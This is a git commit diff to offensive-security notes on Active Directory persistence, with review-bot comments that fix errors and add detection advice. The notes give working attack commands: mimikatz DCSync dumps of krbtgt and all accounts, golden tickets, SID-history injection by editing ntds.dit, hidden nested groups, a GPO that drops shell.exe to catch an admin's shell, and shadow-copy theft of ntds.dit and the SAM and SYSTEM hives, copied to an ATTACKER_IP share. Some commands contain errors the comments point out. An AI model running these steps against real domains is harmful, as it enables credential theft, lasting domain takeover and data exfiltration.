even more info
This commit is contained in:
parent
c78967a9a9
commit
e8c3e42f94
@ -1,9 +1,8 @@
# Active Directory Persistance
## Using Credentials
* __Knowledge Consistency Checker (KCC)__ replicates credentials through the forest
* __Knowledge Consistency Checker (KCC)__ replicates credentials through the forest
* __DC Synchronisation__ is the process of syncing credentials between domain controllers, it can be used to gather credentials
* Credentials for multiple local administrators
* Service account with delegation permissions
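Review bot: the `Knowledge Consistency Checker (KCC)` bullet (both copies of the line) misstates what KCC does: it builds and maintains the replication topology between domain controllers; it does not replicate credentials itself, that is directory replication, which the `DC Synchronisation` bullet below already describes. Suggest "generates the replication topology that DC synchronisation follows". Also "Persistance" in the `# Active Directory Persistance` heading should be "Persistence", and the last two bullets (`Credentials for multiple local administrators`, `Service account with delegation permissions`) need a lead-in or verb so they read as a list of what this section covers rather than bare fragments.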
@ -11,22 +10,27 @@
### Usage
* Use mimikatz
Use mimikatz
```sh
lsadump::dcsync /domain:<domain> /user:<username>
```
* To query the krbtgt user
To query the krbtgt user
```sh
lsadump::dcsync /domain:<domain> /user:krbtgt.<domain>
```
* Query everything
Query everything
```sh
lsadump::dcsync /domain:<domain> /all
```
## Using Tickets
* __Golden Ticket__ crafted TGT,
* __Golden Ticket__ crafted TGT,
* Needs domain name, domain SID and a user ID to impersonate
* Needs krbtgt NTLM to sign the ticket
* krbtgt hash never rotates automatically, only refreshed manually
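Review bot: the second mimikatz line uses `/user:krbtgt.<domain>`, which is not a form mimikatz resolves; with `/domain:<domain>` already given, `/user:krbtgt` is sufficient (the down-level `<domain>\krbtgt` form also works). The `/all` variant deserves a sentence saying that it pulls every account's secrets and produces the same directory-replication request pattern that DCSync detection rules look for (a 4662 on the domain object with the replication control access rights, from a host that is not a DC), since this is a persistence guide and readers should know what it leaves behind. Style: the bullet markers were dropped from `Use mimikatz`, `To query the krbtgt user` and `Query everything`, leaving bare sentences between fenced blocks; keep them as bullets like the rest of the file.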
@ -40,7 +44,7 @@ lsadump::dcsync /domain:<domain> /all
* DC is never contacted, no contact to any TGT or KDC
* Non existing user can be used with a local admin group's SID
### Usage
### Usage
* Craft a golden ticket
```sh
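Review bot: `DC is never contacted, no contact to any TGT or KDC` overstates it: a forged TGT only skips the AS exchange; every service ticket still comes from a TGS-REQ to a KDC, so the domain controller does see the ticket in use and logs a 4769 for it. Suggest "the KDC is not contacted to obtain the TGT". Likewise `a local admin group's SID` should read "a domain group's SID (for example the Domain Admins RID 512)": the PAC carries domain group SIDs, not local-group SIDs, which is also why a ticket for a non-existent user works and why a 4769 for an account that does not exist in the directory is the detection to mention here.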
@ -95,22 +99,24 @@ Get-ADUser <your ad username> -properties sidhistory,memberof
```sh
Get-ADGroup "Domain Admins"
```
* Use [DSInternals](https://github.com/MichaelGrafnetter/DSInternals) to patch `ntds.dit`
Use [DSInternals](https://github.com/MichaelGrafnetter/DSInternals) to patch `ntds.dit`
```sh
Stop-Service -Name ntds -force
Add-ADDBSidHistory -SamAccountName 'username of our low-priveleged AD account' -SidHistory 'SID to add to SID History' -DatabasePath C:\Windows\NTDS\ntds.dit
Add-ADDBSidHistory -SamAccountName 'username of our low-priveleged AD account' -SidHistory 'SID to add to SID History' -DatabasePath C:\Windows\NTDS\ntds.dit
Start-Service -Name ntds
```
* Verify users SIDs
```sh
Get-ADUser <username> -Properties sidhistory
Get-ADUser <username> -Properties sidhistory
dir \\<dc.example.com>\C$\
```
## Using Group Memberships
* Most are monitored security wise
* Interesting group for persistence are
* Interesting group for persistence are
* `IT Support`
* Local administrational accounts
* Groups with ownership over GPO
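Review bot: on the `Add-ADDBSidHistory` line, "low-priveleged" should be "low-privileged". The surrounding text should also say what `Stop-Service -Name ntds -force` implies: the domain controller stops answering authentication while the database is edited offline, and an offline `sIDHistory` write does not raise the SID History audit events a live write would, so the defender-side check is a periodic comparison of `sIDHistory` values against migration records (the `Get-ADUser <username> -Properties sidhistory` line already shows how to read them). Minor: `Verify users SIDs` should be `Verify the user's SIDs`, and `Interesting group for persistence are` should be `Interesting groups for persistence are`.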
@ -126,7 +132,7 @@ New-ADGroup -Path "OU=IT,OU=People,DC=<SUBDC>,DC=<DOMAIN>,DC=COM" -Name "<userna
```
* And nesting another one
```sh
New-ADGroup -Path "OU=SALES,OU=People,DC=ZA,DC=TRYHACKME,DC=LOC" -Name "<username> Steam Network 2" -SamAccountName "<username>_steam_network2" -DisplayName "<username> Steam Network 2" -GroupScope Global -GroupCategory Security
New-ADGroup -Path "OU=SALES,OU=People,DC=ZA,DC=TRYHACKME,DC=LOC" -Name "<username> Steam Network 2" -SamAccountName "<username>_steam_network2" -DisplayName "<username> Steam Network 2" -GroupScope Global -GroupCategory Security
Add-ADGroupMember -Identity "<username>_steam_network2" -Members "<username>_steam_network1"
```
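Review bot: the `New-ADGroup` line hardcodes `OU=SALES,OU=People,DC=ZA,DC=TRYHACKME,DC=LOC` while the hunk's context line (`New-ADGroup -Path "OU=IT,OU=People,DC=<SUBDC>,DC=<DOMAIN>,DC=COM" ...`) uses placeholders; use the same `<SUBDC>`/`<DOMAIN>` placeholders here so the two nested-group examples are consistent and the file does not carry a lab-specific DN. The `-Path` also moves from `OU=IT` to `OU=SALES` between the first and second group without explanation; if that is deliberate, say why, since nesting across OUs is part of what makes the membership chain harder to spot in a group audit.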
@ -154,7 +160,7 @@ Get-ADGroupMember -Identity "Domain Admins"
* AD group templates like `AdminSDHolder` can be used to copy its ACL through the AD's protected groups
* Domain Admins
* Administrators
* Administrators
* Enterprise/Schema Administrator
* SDProp as a process maps the ACLs to protected groups every hour
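Review bot: `AD group templates like AdminSDHolder` is inaccurate: AdminSDHolder is a container object under `CN=System`, not a group template, and it is SDProp (the last bullet) that stamps AdminSDHolder's ACL onto the protected groups and their members roughly every 60 minutes. Suggest "The ACL of the AdminSDHolder container is copied by SDProp to the protected groups ...". `Enterprise/Schema Administrator` should name the actual groups, `Enterprise Admins` and `Schema Admins`. Worth adding for defenders: the same mechanism is why an ACE added to AdminSDHolder is worth alerting on, since removing it from one protected object does nothing; it is reapplied from the container within the hour.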
@ -190,7 +196,7 @@ copy \\<domain>\sysvol\<subdomain>\scripts\shell.exe C:\windows\tmp\_shell.exe &
* Select the previously created batch script and PE
* Catch the shell when an admin logs on
* Once again open mmc
* Once again open mmc
* Right click Enterprise Domain Controllers -> Edit settings, delete, modify security
* Click on every other group except Authenticated Users and remove them
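Review bot: `Once again open mmc` does not say which snap-in or which object is being edited; the earlier steps in this section work on a GPO, so name the Group Policy Management console and its Delegation tab, and state what the `Edit settings, delete, modify security` permission on `Enterprise Domain Controllers` is for, because as written the bullet reads as a menu path with no purpose. The last bullet (`Click on every other group except Authenticated Users and remove them`) should say what it achieves and what it does not: the GPO is no longer readable in the console by the removed groups, but it is still a `groupPolicyContainer` object in the directory and still appears in `gpresult` on the hosts it applies to, which is where an auditor should look.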
@ -337,6 +337,17 @@ copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\sam
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\system \\ATTACKER_IP\
```
#### In case you are on a DC
You can extract the AD database which stores every domain account and its password hash via Volume Shadow Copy Service. `NTDS.dit` is stored at `C:\Windows\NTDS\ntdis.dit`.
```sh
vssadmin create shadow /for=C:
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\ntds.dit C:\TEMP\ntds.dit
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\TEMP\system
vssadmin delete shadows /shadow={$SHADOW_ID} /quiet
```
### Dump LSASS
LSASS contains multiple different credential types like NTLM password hashes,
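Review bot: `C:\Windows\NTDS\ntdis.dit` in the paragraph is a typo for `C:\Windows\NTDS\ntds.dit` (the `copy` line below already uses the correct name). The block assumes `HarddiskVolumeShadowCopy1` for the two copies but deletes `{$SHADOW_ID}`; `vssadmin create shadow` prints both the shadow copy volume name and its ID, so tell the reader to take both from that output rather than assuming `...Copy1`, and `$SHADOW_ID` inside a `sh` fence reads as a shell variable that is never set. `C:\TEMP` must exist before the `copy` runs. The text should also say why the SYSTEM hive is copied alongside `ntds.dit` (the database is unreadable without the boot key it holds), and, for defenders, that `vssadmin create shadow` followed by reads from the shadow path on a domain controller is a well-known pattern worth a process-creation (4688) rule for `vssadmin.exe` on DCs.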